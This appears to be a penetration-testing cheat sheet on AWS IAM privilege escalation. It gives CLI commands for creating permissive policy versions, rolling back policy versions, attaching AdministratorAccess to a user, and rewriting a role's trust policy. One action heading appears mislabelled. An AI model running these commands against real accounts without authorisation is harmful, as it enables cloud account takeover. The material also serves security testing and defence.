IAM - Privilege Escalation

Tips and tricks for escalating privileges using IAM actions.

iam:CreatePolicyVersion and iam:SetDefaultPolicyVersion

  • If these two actions are available, you can update a policy with modified permissions and enable it for use.

  • Create an IAM permissions policy locally saved to a JSON file e.g.,

# example iam policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "s3:*",
            "Resource": "*"
        }
    ]
}
aws iam create-policy-version --policy-arn arn:aws:iam::<accountId>:policy/<policyName> --policy-document file://<policyName>.json --set-as-default
Escalate Privileges by IAM Policy Rollback

iam:SetExistingDefaultPolicyVersion

  • If this action is available, you can attach a different version of an IAM policy to an IAM user.

  • Potentially, another policy has a different set of privileges to give you more or new access.

# view available versions of a policy
aws iam list-policy-versions --policy-arn <policyArn>

# view the policy for a particular version
aws iam get-policy-version --policy-arn <policyArn> --version-id <versionId>

# attach a specific version of a policy
aws iam set-default-policy-version --policy-arn <policyArn> --version-id <versionId>

iam:AttachUserPolicy

  • If this action is available, you can attach a new policy to an IAM user

aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name <userName> 

iam:UpdateAssumeRolePolicy

  • With this action, you can modify an IAM Role's Trust Policy and enable yourself to assume it

  • You could choose an IAM user, role, or service

# example trust policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::<accountId>:user/<userName>"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}
aws iam update-assume-role-policy --role-name <roleName> --policy-document file://<trustPolicy>.json

Last updated